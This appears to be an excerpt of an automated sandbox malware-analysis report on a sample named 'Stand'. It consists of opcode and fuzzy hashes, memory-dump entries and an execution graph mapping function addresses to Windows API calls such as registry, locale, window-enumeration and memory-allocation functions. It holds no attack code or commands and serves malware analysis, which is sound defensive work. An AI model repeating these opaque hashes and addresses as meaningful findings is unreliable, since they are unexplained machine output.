                                                                              • Opcode Fuzzy Hash: 74336f2c412e126b6ef04d14c8d0de8deeebf129662f025fb61ce363548d6c13
                                                                              • Instruction Fuzzy Hash: 6B41C77160DA884FD31ADB7CD8A5925BBE1EF8930071442AED09AC72A3CD24FD07C741
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1807633546.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_7ffd9b8d0000_Stand.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 8d8f92790b4b1b0abd9f707bbdcbb4f7cea5eedfa06837d97d9098574c583c9d
                                                                              • Instruction ID: f425d45d37a253f27b0f369eb7ad2b08bf533b1a2f8cbee1762102578a4bdb51
                                                                              • Opcode Fuzzy Hash: 8d8f92790b4b1b0abd9f707bbdcbb4f7cea5eedfa06837d97d9098574c583c9d
                                                                              • Instruction Fuzzy Hash: 1A319552D9E7C50FF70B637649265A46F64DE27AA570A46FFC0D7CB8A3C50C480B8322
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1807633546.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_7ffd9b8d0000_Stand.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 58ed4162dc43bffa06f1e79bc2d5c4cd11c4ab738149d2a124cb61865b40f646
                                                                              • Instruction ID: ee95a536e39eb2d1bcd077f82968dbcf5e9a5a76da63ee66d76b3f41614bbce9
                                                                              • Opcode Fuzzy Hash: 58ed4162dc43bffa06f1e79bc2d5c4cd11c4ab738149d2a124cb61865b40f646
                                                                              • Instruction Fuzzy Hash: 3B41D330319B844FD75ADB28C4A1A657BE1EF89700B05429ED09EC72A3CE29ED47C742
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1807633546.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_7ffd9b8d0000_Stand.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d0781e675bd63e7a2dfa2a5da757cc4ea4df07ed0b0ce589ae1de0bc7a32c953
                                                                              • Instruction ID: c202e1f07ce63dd70d5dc6519bc271ec0826135dc896f0e739963b2e70d6b925
                                                                              • Opcode Fuzzy Hash: d0781e675bd63e7a2dfa2a5da757cc4ea4df07ed0b0ce589ae1de0bc7a32c953
                                                                              • Instruction Fuzzy Hash: C311A811B1E9990FD75AA3B444656EC7BA0DF89204F550AFEC449C71E3DD1C690B8741
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1807633546.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_7ffd9b8d0000_Stand.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7ea10ac1a54a272d4ce87ff0fe0a478482f3c3d8dc3234df8d51ff57fcf97cbe
                                                                              • Instruction ID: 5ea9efd42661583dc50321a28c229c2f66a47f7c510d3d3c58f22b5f83d688a0
                                                                              • Opcode Fuzzy Hash: 7ea10ac1a54a272d4ce87ff0fe0a478482f3c3d8dc3234df8d51ff57fcf97cbe
                                                                              • Instruction Fuzzy Hash: DE11D32160E6C51FE36AD7788865BA57FE1EF8A310F1942FAD0C8CB1E7C91858468382
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1807633546.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_7ffd9b8d0000_Stand.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b38dcc4cf06364a734f0bb6f9f9fd07c625b96486a0ffa48fe3371811e774789
                                                                              • Instruction ID: 042ab2204fb9ca176b4853e2635877dc1f3934940cbf7d4bb5ed30b39e903c09
                                                                              • Opcode Fuzzy Hash: b38dcc4cf06364a734f0bb6f9f9fd07c625b96486a0ffa48fe3371811e774789
                                                                              • Instruction Fuzzy Hash: B001CC3430C81C8FDAA8EA1CE464E6973D1FF5836171106EAF05DC72A6CA20DC408B85
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1807633546.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_7ffd9b8d0000_Stand.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 95181f1c9f9f11afd895db8f81950856093bf9fefd6e5e12a67353509d43b738
                                                                              • Instruction ID: 39b54c60164e214c30ef02879b813c6764232a61e4f3a97eb6aae1eaf9ca35ba
                                                                              • Opcode Fuzzy Hash: 95181f1c9f9f11afd895db8f81950856093bf9fefd6e5e12a67353509d43b738
                                                                              • Instruction Fuzzy Hash: A411044070F9CA5FE356E7B858267ACAFA1CF8A250F6849FEC089C75E7C81858068343
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1807633546.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_7ffd9b8d0000_Stand.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: db42202054280988b2b8f949d4699d25245b657138e21e828535604d4261d62c
                                                                              • Instruction ID: 4e1c0e961bdc9383044b1e1d918d22924b7cf4e7c95f8938481e683e4fd0a7d3
                                                                              • Opcode Fuzzy Hash: db42202054280988b2b8f949d4699d25245b657138e21e828535604d4261d62c
                                                                              • Instruction Fuzzy Hash: C2F0C811B19D9A4EE70AB3784436BFD77A0EF85308F8549BAD04DC31D7CD1C59168346
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1807633546.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_7ffd9b8d0000_Stand.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3411821edecc74ecff336024e61483e57bffa72c65beb4872fa5b4447aa82cd4
                                                                              • Instruction ID: 38f16ac3a30947e9e78c5bdea83ee587a9a99d7068e414b0adb10395517460b8
                                                                              • Opcode Fuzzy Hash: 3411821edecc74ecff336024e61483e57bffa72c65beb4872fa5b4447aa82cd4
                                                                              • Instruction Fuzzy Hash: 02E0EC03F1ED5A09F779236818721B81A919FD9610F0507BBD069C51D7DD0D2D814381
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1807633546.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_7ffd9b8d0000_Stand.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 28c2204c1e796cb351583ae924d5e1ae41e055c709f8baf43e06264799c3c6e4
                                                                              • Instruction ID: da5dda5e2621c45e3761c4c9b3cdd823288f44979222a136ae72ecad76469faa
                                                                              • Opcode Fuzzy Hash: 28c2204c1e796cb351583ae924d5e1ae41e055c709f8baf43e06264799c3c6e4
                                                                              • Instruction Fuzzy Hash: 64E012307149094FD754E76CE4656A9B3D1FF88314F8105B9E01DC72E6CE29A9418700
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1807633546.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_7ffd9b8d0000_Stand.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 89dbd3eb3aa2bfcf8855c3a9c3967c272a8e61c7a6fc8e9979ec6e2fa1b1efc2
                                                                              • Instruction ID: 00af440d7055e742e32bd3fa6cc6e3bcc408af4a5ef0d45110be4bf4bd6dec45
                                                                              • Opcode Fuzzy Hash: 89dbd3eb3aa2bfcf8855c3a9c3967c272a8e61c7a6fc8e9979ec6e2fa1b1efc2
                                                                              • Instruction Fuzzy Hash: 7EE0D853B2EB990FD275932C48751547E919B8D60070602DBC049C71A3E9445D088381
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1807633546.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_7ffd9b8d0000_Stand.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d684b54bdf2cd364dbb139072e4b0c393e62922f4a28ae295de44ec2c56701cd
                                                                              • Instruction ID: 2428802e7d30b0ea1eea0516bf31aa3fbe6c3a4c9080d8e9049d0e7db660f364
                                                                              • Opcode Fuzzy Hash: d684b54bdf2cd364dbb139072e4b0c393e62922f4a28ae295de44ec2c56701cd
                                                                              • Instruction Fuzzy Hash: E2D0233555454C47CB147B65B4014D7B754FF8931DF00057FF91CC6041D72796354791
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Execution Graph

                                                                              Execution Coverage:5.9%
                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                              Signature Coverage:4.8%
                                                                              Total number of Nodes:875
                                                                              Total number of Limit Nodes:17
                                                                              execution_graph 8657 41e7cfb 8662 41e7c54 8657->8662 8659 41e7d1f 8660 41e7d40 CompareStringW 8659->8660 8661 41e7d61 8660->8661 8665 41ef034 8662->8665 8668 41eefa4 8665->8668 8667 41e7c66 8667->8659 8670 41eefc5 8668->8670 8669 41eefeb 8669->8667 8670->8669 8672 41eed58 8670->8672 8673 41eed8a 8672->8673 8674 41eed6d 8672->8674 8673->8669 8675 41eedc8 8674->8675 8677 41eed75 8674->8677 8680 41ef114 MultiByteToWideChar 8675->8680 8679 41ef114 MultiByteToWideChar 8677->8679 8679->8673 8680->8673 8681 41ec498 8682 41ec4a8 GetModuleFileNameW 8681->8682 8684 41ec4c4 8681->8684 8685 41ed70c GetModuleFileNameW 8682->8685 8686 41ed75a 8685->8686 8691 41ed5e8 8686->8691 8688 41ed786 8689 41ed798 LoadLibraryExW 8688->8689 8690 41ed7a0 8688->8690 8689->8690 8690->8684 8692 41ed609 8691->8692 8699 41ed691 8692->8699 8709 41ed324 8692->8709 8694 41ed67e 8695 41ed684 8694->8695 8696 41ed693 GetUserDefaultUILanguage 8694->8696 8697 41ed450 2 API calls 8695->8697 8713 41eccd4 EnterCriticalSection 8696->8713 8697->8699 8699->8688 8700 41ed6a0 8733 41ed450 8700->8733 8702 41ed6ad 8703 41ed6d5 8702->8703 8704 41ed6bb GetSystemDefaultUILanguage 8702->8704 8703->8699 8737 41ed51c 8703->8737 8705 41eccd4 17 API calls 8704->8705 8707 41ed6c8 8705->8707 8708 41ed450 2 API calls 8707->8708 8708->8703 8710 41ed346 8709->8710 8712 41ed350 8709->8712 8745 41ed008 8710->8745 8712->8694 8714 41ecd20 LeaveCriticalSection 8713->8714 8715 41ecd00 8713->8715 8782 41e9d94 8714->8782 8717 41ecd11 LeaveCriticalSection 8715->8717 8727 41ecdc2 8717->8727 8718 41ecd31 IsValidLocale 8719 41ecd8f EnterCriticalSection 8718->8719 8720 41ecd40 8718->8720 8721 41ecda7 8719->8721 8722 41ecd49 8720->8722 8723 41ecd54 8720->8723 8728 41ecdb8 LeaveCriticalSection 8721->8728 8784 41ecbb8 GetThreadUILanguage 8722->8784 8797 41ec9bc 8723->8797 8726 41ecd5d GetSystemDefaultUILanguage 8726->8719 8729 41ecd67 8726->8729 8727->8700 8728->8727 8730 41ecd78 GetSystemDefaultUILanguage 8729->8730 8731 41ec9bc 3 API calls 8730->8731 8732 41ecd52 8731->8732 8732->8719 8735 41ed46e 8733->8735 8734 41ed4e9 8734->8702 8735->8734 8806 41ed3e4 8735->8806 8811 41e9e78 8737->8811 8740 41ed56c 8741 41ed3e4 2 API calls 8740->8741 8742 41ed580 8741->8742 8743 41ed5ae 8742->8743 8744 41ed3e4 2 API calls 8742->8744 8743->8699 8744->8743 8746 41ed01f 8745->8746 8747 41ed033 GetModuleFileNameW 8746->8747 8748 41ed048 8746->8748 8747->8748 8749 41ed070 RegOpenKeyExW 8748->8749 8756 41ed217 8748->8756 8750 41ed097 RegOpenKeyExW 8749->8750 8751 41ed131 8749->8751 8750->8751 8752 41ed0b5 RegOpenKeyExW 8750->8752 8766 41ece18 GetModuleHandleW 8751->8766 8752->8751 8754 41ed0d3 RegOpenKeyExW 8752->8754 8754->8751 8757 41ed0f1 RegOpenKeyExW 8754->8757 8755 41ed14f RegQueryValueExW 8758 41ed1a0 RegQueryValueExW 8755->8758 8760 41ed16d 8755->8760 8756->8712 8757->8751 8759 41ed10f RegOpenKeyExW 8757->8759 8761 41ed1bc 8758->8761 8765 41ed19e 8758->8765 8759->8751 8759->8756 8762 41ed175 RegQueryValueExW 8760->8762 8763 41ed1c4 RegQueryValueExW 8761->8763 8762->8765 8763->8765 8764 41ed206 RegCloseKey 8764->8712 8765->8764 8767 41ece51 8766->8767 8768 41ece40 GetProcAddress 8766->8768 8769 41ece67 8767->8769 8774 41eceb3 8767->8774 8778 41ecdf4 8767->8778 8768->8767 8769->8755 8772 41ecdf4 CharNextW 8772->8774 8773 41ecdf4 CharNextW 8773->8774 8774->8769 8774->8773 8775 41ecf38 FindFirstFileW 8774->8775 8777 41ecfa2 lstrlenW 8774->8777 8775->8769 8776 41ecf54 FindClose lstrlenW 8775->8776 8776->8769 8776->8774 8777->8774 8779 41ece02 8778->8779 8780 41ece10 8779->8780 8781 41ecdfa CharNextW 8779->8781 8780->8769 8780->8772 8781->8779 8783 41e9d9a 8782->8783 8783->8718 8785 41ecc2d 8784->8785 8786 41ecbd4 8784->8786 8787 41ecb74 2 API calls 8785->8787 8802 41ecb74 GetThreadPreferredUILanguages 8786->8802 8792 41ecc35 8787->8792 8791 41ecc7c SetThreadPreferredUILanguages 8793 41ecb74 2 API calls 8791->8793 8792->8791 8796 41eccbd 8792->8796 8794 41ecc92 8793->8794 8795 41eccad SetThreadPreferredUILanguages 8794->8795 8794->8796 8795->8796 8796->8732 8798 41ec9f7 8797->8798 8799 41eca60 IsValidLocale 8798->8799 8800 41ecaae 8798->8800 8799->8800 8801 41eca73 GetLocaleInfoW GetLocaleInfoW 8799->8801 8800->8726 8801->8800 8803 41ecbae SetThreadPreferredUILanguages 8802->8803 8804 41ecb95 8802->8804 8803->8785 8805 41ecb9e GetThreadPreferredUILanguages 8804->8805 8805->8803 8807 41ed3f9 8806->8807 8808 41ed416 FindFirstFileW 8807->8808 8809 41ed426 FindClose 8808->8809 8810 41ed42c 8808->8810 8809->8810 8810->8735 8812 41e9e7c GetUserDefaultUILanguage GetLocaleInfoW 8811->8812 8812->8740 8813 41e5968 8814 41e5bc8 8813->8814 8815 41e5980 8813->8815 8816 41e5b8c 8814->8816 8817 41e5ce0 8814->8817 8824 41e5992 8815->8824 8827 41e5a1d Sleep 8815->8827 8826 41e5ba6 Sleep 8816->8826 8828 41e5be6 8816->8828 8818 41e5ce9 8817->8818 8819 41e5714 VirtualAlloc 8817->8819 8821 41e574f 8819->8821 8822 41e573f 8819->8822 8820 41e59a1 8837 41e56c8 8822->8837 8824->8820 8825 41e5a80 8824->8825 8831 41e5a61 Sleep 8824->8831 8836 41e5a8c 8825->8836 8842 41e564c 8825->8842 8826->8828 8829 41e5bbc Sleep 8826->8829 8827->8824 8830 41e5a33 Sleep 8827->8830 8832 41e564c VirtualAlloc 8828->8832 8833 41e5c04 8828->8833 8829->8816 8830->8815 8831->8825 8835 41e5a77 Sleep 8831->8835 8832->8833 8835->8824 8838 41e5710 8837->8838 8839 41e56d1 8837->8839 8838->8821 8839->8838 8840 41e56dc Sleep 8839->8840 8840->8838 8841 41e56f6 Sleep 8840->8841 8841->8839 8846 41e55e0 8842->8846 8844 41e5655 VirtualAlloc 8845 41e566c 8844->8845 8845->8836 8847 41e5580 8846->8847 8847->8844 8848 43fd368 8853 43fd1f8 8848->8853 8850 43fd372 8851 43fd376 Sleep 8850->8851 8852 43fd382 8850->8852 8851->8848 8866 43fd10c 8853->8866 8855 43fd216 8856 43fd234 EnumChildWindows 8855->8856 8859 43fd2ef 8855->8859 8857 43fd24f 8856->8857 8858 43fd2a3 Sleep 8856->8858 8870 42cbedc 8857->8870 8874 41ea174 8858->8874 8859->8850 8862 43fd2c0 EnumChildWindows 8862->8859 8863 43fd2db PostMessageW 8862->8863 8863->8859 8864 43fd261 8864->8858 8865 43fd284 SendMessageW 8864->8865 8865->8858 8865->8865 8867 41ea174 8866->8867 8868 43fd125 EnumWindows 8867->8868 8869 43fd13a 8868->8869 8876 43fd074 SendMessageW 8868->8876 8869->8855 8872 42cbefd 8870->8872 8873 42cbf4f 8872->8873 8880 41ec0c0 8872->8880 8873->8864 8875 41ea178 8874->8875 8875->8862 8877 43fd0aa 8876->8877 8878 43fd0b2 SendMessageW 8877->8878 8879 43fd0ce 8878->8879 8883 41ebe18 8880->8883 8882 41ec0ca 8882->8873 8884 41ebe56 8883->8884 8887 41ebe3b 8883->8887 8885 41ebec4 8884->8885 8888 41ebf91 8884->8888 8893 41ebf2b 8885->8893 8894 41ebdd4 8885->8894 8887->8882 8888->8893 8911 41eb8f8 8888->8911 8889 41ebe18 26 API calls 8889->8893 8891 41ebedc 8891->8893 8904 41eb7d0 8891->8904 8893->8887 8893->8889 8915 41f028c 8894->8915 8896 41ebddd 8897 41ebde5 8896->8897 8898 41ebdf3 8896->8898 8899 41f028c 4 API calls 8897->8899 8900 41f028c 4 API calls 8898->8900 8903 41ebdea 8899->8903 8901 41ebe01 8900->8901 8902 41f028c 4 API calls 8901->8902 8902->8903 8903->8891 8905 41eb7ec 8904->8905 8906 41eb830 8904->8906 8905->8906 8907 41eb86a 8905->8907 8908 41eb899 8905->8908 8906->8893 8907->8906 8910 41eb7d0 26 API calls 8907->8910 8908->8906 8930 41eb4f4 8908->8930 8910->8907 8912 41eb909 8911->8912 8913 41eb901 8911->8913 8912->8893 9004 41eb6b8 8913->9004 8916 41f029b 8915->8916 8917 41f02c1 TlsGetValue 8915->8917 8916->8896 8918 41f02cb 8917->8918 8919 41f02a6 8917->8919 8918->8896 8923 41f01c0 8919->8923 8921 41f02ab TlsGetValue 8922 41f02ba 8921->8922 8922->8896 8924 41f01c6 8923->8924 8928 41f01ea 8924->8928 8929 41f01ac LocalAlloc 8924->8929 8926 41f01e6 8927 41f01f6 TlsSetValue 8926->8927 8926->8928 8927->8928 8928->8921 8929->8926 8931 41eb517 8930->8931 8932 41eb693 8930->8932 8931->8932 8933 41eb7d0 26 API calls 8931->8933 8934 41eb4f4 26 API calls 8931->8934 8937 41eeb8c 8931->8937 8943 41eeb60 8931->8943 8932->8908 8933->8931 8934->8931 8938 41eeb9e 8937->8938 8939 41eeb60 14 API calls 8938->8939 8940 41eebb3 8939->8940 8947 41eeaf4 8940->8947 8942 41eebca 8942->8931 8944 41eeb6b 8943->8944 8945 41eeb85 8943->8945 8993 41eeb2c 8944->8993 8945->8931 8948 41eeb27 8947->8948 8949 41eeaff 8947->8949 8948->8942 8951 41ee734 8949->8951 8952 41ee758 8951->8952 8953 41ee750 8951->8953 8974 41ee474 8952->8974 8963 41ee5d0 8953->8963 8956 41ee7c3 8989 41ee4dc 8956->8989 8957 41ee780 8957->8956 8978 41ee53c 8957->8978 8964 41ee5e9 8963->8964 8965 41ee685 8963->8965 8966 41ee5fa 8964->8966 8967 41e8850 GetModuleHandleW GetProcAddress GetLogicalProcessorInformation GetLastError GetLogicalProcessorInformation 8964->8967 8965->8952 8968 41e89ac 13 API calls 8966->8968 8967->8966 8973 41ee629 8968->8973 8969 41ee658 8970 41e8b44 GetCurrentThreadId Sleep 8969->8970 8972 41ee67d 8970->8972 8971 41ee460 GetModuleHandleW GetProcAddress GetLogicalProcessorInformation GetLastError GetLogicalProcessorInformation 8971->8973 8972->8952 8973->8969 8973->8971 8975 41ee47d 8974->8975 8976 41ee487 8974->8976 8977 41e89ac 13 API calls 8975->8977 8976->8957 8977->8976 8979 41ee544 8978->8979 8980 41ee54d 8979->8980 8981 41ee00c GetModuleHandleW GetProcAddress GetLogicalProcessorInformation GetLastError GetLogicalProcessorInformation 8979->8981 8982 41ee2f0 8980->8982 8981->8980 8983 41ee30a 8982->8983 8984 41ee313 8983->8984 8986 41ee32d 8983->8986 8985 41ec0c0 26 API calls 8984->8985 8987 41ee328 8985->8987 8986->8987 8988 41ec0c0 26 API calls 8986->8988 8987->8956 8988->8987 8990 41ee4ec 8989->8990 8991 41ee4e5 8989->8991 8990->8948 8992 41e8b44 GetCurrentThreadId Sleep 8991->8992 8992->8990 8994 41eeb3d 8993->8994 8995 41eeb30 8993->8995 8994->8945 8997 41ee80c 8995->8997 8998 41ee82c 8997->8998 8999 41ee8b8 8997->8999 9000 41ee474 13 API calls 8998->9000 8999->8994 9001 41ee854 9000->9001 9002 41ee4dc 2 API calls 9001->9002 9003 41ee893 9002->9003 9003->8994 9005 41eb6cd 9004->9005 9012 41eb6ea 9004->9012 9006 41eb71e 9005->9006 9007 41eb6d2 9005->9007 9006->9012 9014 41ea1e8 9006->9014 9009 41eb75d 9007->9009 9010 41eb6e1 9007->9010 9007->9012 9009->9012 9013 41eb6b8 26 API calls 9009->9013 9010->9012 9024 41eb34c 9010->9024 9012->8912 9013->9009 9015 41ea20f 9014->9015 9016 41ea1ec 9014->9016 9015->9006 9017 41e9ddc 9016->9017 9020 41ea1ff SysReAllocStringLen 9016->9020 9018 41e9de2 SysFreeString 9017->9018 9019 41e9df0 9017->9019 9018->9019 9019->9006 9020->9015 9021 41e9d74 9020->9021 9022 41e9d90 9021->9022 9023 41e9d80 SysAllocStringLen 9021->9023 9022->9006 9023->9021 9023->9022 9025 41eb4db 9024->9025 9028 41eb371 9024->9028 9025->9010 9026 41eeb8c 26 API calls 9026->9028 9027 41ea1e8 3 API calls 9027->9028 9028->9025 9028->9026 9028->9027 9029 41eb6b8 26 API calls 9028->9029 9030 41eb34c 26 API calls 9028->9030 9029->9028 9030->9028 9031 43c7d04 PeekMessageW 9032 43c7d25 9031->9032 9038 43c7e06 9031->9038 9033 43c7d35 9032->9033 9034 43c7d2b IsWindowUnicode 9032->9034 9035 43c7d5c PeekMessageA 9033->9035 9036 43c7d46 PeekMessageW 9033->9036 9034->9033 9037 43c7d70 9035->9037 9036->9037 9037->9038 9052 43c9ba0 GetCapture 9037->9052 9040 43c7dab 9040->9038 9059 43c7b98 9040->9059 9049 43c7de9 TranslateMessage 9050 43c7dfe DispatchMessageA 9049->9050 9051 43c7df6 DispatchMessageW 9049->9051 9050->9038 9051->9038 9053 43c9bb5 9052->9053 9056 43c9bc6 9052->9056 9053->9056 9087 4311d04 9053->9087 9055 43c9bd7 GetParent 9055->9056 9057 43c9bd1 9055->9057 9056->9040 9057->9055 9057->9056 9058 4311d04 7 API calls 9057->9058 9058->9057 9060 43c7bac 9059->9060 9061 43c7bc3 9059->9061 9060->9061 9100 43c9180 9060->9100 9061->9038 9063 43c7a50 9061->9063 9064 43c7a9a 9063->9064 9065 43c7a60 9063->9065 9064->9038 9067 43c7aa0 9064->9067 9065->9064 9066 43c7a87 TranslateMDISysAccel 9065->9066 9066->9064 9068 43c7b8e 9067->9068 9069 43c7abb 9067->9069 9068->9038 9082 43c7a08 9068->9082 9069->9068 9070 43c7ac6 GetCapture 9069->9070 9071 43c7b50 GetWindowThreadProcessId GetWindowThreadProcessId 9070->9071 9072 43c7ad1 9070->9072 9071->9068 9073 43c7b71 SendMessageW 9071->9073 9076 43c7b02 9072->9076 9078 43c7aeb GetParent 9072->9078 9079 43c7ae2 9072->9079 9435 4311d60 9072->9435 9073->9068 9074 43c7b2d 9073->9074 9074->9068 9077 43c7b08 IsWindowUnicode 9076->9077 9076->9079 9080 43c7b31 SendMessageA 9077->9080 9081 43c7b12 SendMessageW 9077->9081 9078->9072 9079->9077 9080->9068 9080->9074 9081->9068 9081->9074 9083 43c7a4d 9082->9083 9084 43c7a19 IsWindowUnicode 9082->9084 9083->9038 9083->9049 9085 43c7a3a IsDialogMessageA 9084->9085 9086 43c7a25 IsDialogMessageW 9084->9086 9085->9083 9086->9083 9088 4311d56 9087->9088 9089 4311d0f GetWindowThreadProcessId 9087->9089 9088->9057 9089->9088 9090 4311d1a GetCurrentProcessId 9089->9090 9090->9088 9091 4311d24 9090->9091 9092 4311d2e GlobalFindAtomW 9091->9092 9093 4311d3d GetPropW 9092->9093 9094 4311d4f 9092->9094 9093->9088 9096 4311cd0 GetCurrentProcessId GetWindowThreadProcessId 9094->9096 9097 4311ce7 9096->9097 9098 4311cfd 9096->9098 9097->9098 9099 4311cec SendMessageW 9097->9099 9098->9088 9099->9098 9101 43c91ad 9100->9101 9102 43c9196 9100->9102 9101->9061 9108 43c910c 9102->9108 9104 43c919d 9117 43c5a48 9104->9117 9109 43c911a 9108->9109 9116 43c916c 9108->9116 9110 43c9130 IsWindowVisible 9109->9110 9109->9116 9111 43c913a 9110->9111 9110->9116 9112 43c914c 9111->9112 9113 43c916e 9111->9113 9115 43c9159 ShowWindow 9112->9115 9129 43c8f18 9113->9129 9115->9116 9116->9104 9118 43c5a5f 9117->9118 9119 43c5a54 UnhookWindowsHookEx 9117->9119 9120 43c5ac6 9118->9120 9121 43c5a80 SetEvent GetCurrentThreadId 9118->9121 9119->9118 9126 43c8f58 9120->9126 9122 43c5abd CloseHandle 9121->9122 9123 43c5a98 9121->9123 9122->9120 9124 43c5aa4 MsgWaitForMultipleObjects 9123->9124 9135 43c7e30 9123->9135 9124->9122 9124->9123 9127 43c8f75 9126->9127 9128 43c8f65 KillTimer 9126->9128 9127->9101 9128->9127 9130 43c8f58 KillTimer 9129->9130 9131 43c8f28 SetTimer 9130->9131 9132 43c8f4d 9131->9132 9133 43c8f54 9131->9133 9134 43c9180 128 API calls 9132->9134 9133->9116 9134->9133 9140 43c7d04 PeekMessageW 9135->9140 9138 43c7e4c 9138->9124 9141 43c7d25 9140->9141 9147 43c7e06 9140->9147 9142 43c7d35 9141->9142 9143 43c7d2b IsWindowUnicode 9141->9143 9144 43c7d5c PeekMessageA 9142->9144 9145 43c7d46 PeekMessageW 9142->9145 9143->9142 9146 43c7d70 9144->9146 9145->9146 9146->9147 9148 43c9ba0 9 API calls 9146->9148 9147->9138 9161 43c8ad8 9147->9161 9149 43c7dab 9148->9149 9149->9147 9150 43c7b98 122 API calls 9149->9150 9151 43c7db8 9150->9151 9151->9147 9152 43c7a50 TranslateMDISysAccel 9151->9152 9153 43c7dcb 9152->9153 9153->9147 9154 43c7aa0 15 API calls 9153->9154 9155 43c7dd8 9154->9155 9155->9147 9156 43c7a08 3 API calls 9155->9156 9157 43c7de5 9156->9157 9157->9147 9158 43c7de9 TranslateMessage 9157->9158 9159 43c7dfe DispatchMessageA 9158->9159 9160 43c7df6 DispatchMessageW 9158->9160 9159->9147 9160->9147 9181 43c8a4c GetCursorPos 9161->9181 9164 43c9180 126 API calls 9165 43c8b21 9164->9165 9184 43c8d34 9165->9184 9167 43c8b43 9168 43c8b91 GetCurrentThreadId 9167->9168 9170 43c8b89 9167->9170 9171 43c8b93 9167->9171 9172 43c8c0c 9168->9172 9173 43c8c13 9168->9173 9189 43c89e8 9170->9189 9171->9168 9178 43c8baf SetTimer 9171->9178 9195 42a22d0 9172->9195 9176 43c8c26 9173->9176 9177 43c8c21 WaitMessage 9173->9177 9176->9138 9177->9176 9178->9168 9179 43c8bd6 9178->9179 9180 43c89e8 74 API calls 9179->9180 9180->9168 9221 4313878 9181->9221 9186 43c8d48 9184->9186 9185 43c8d5e 9185->9167 9186->9185 9247 433bd7c 9186->9247 9188 43c8d7c 9188->9167 9193 43c89f5 9189->9193 9190 43c8a48 9190->9168 9192 43c8a1f IsWindowVisible 9192->9193 9193->9190 9193->9192 9194 43c8a30 IsWindowEnabled 9193->9194 9263 43c495c 9193->9263 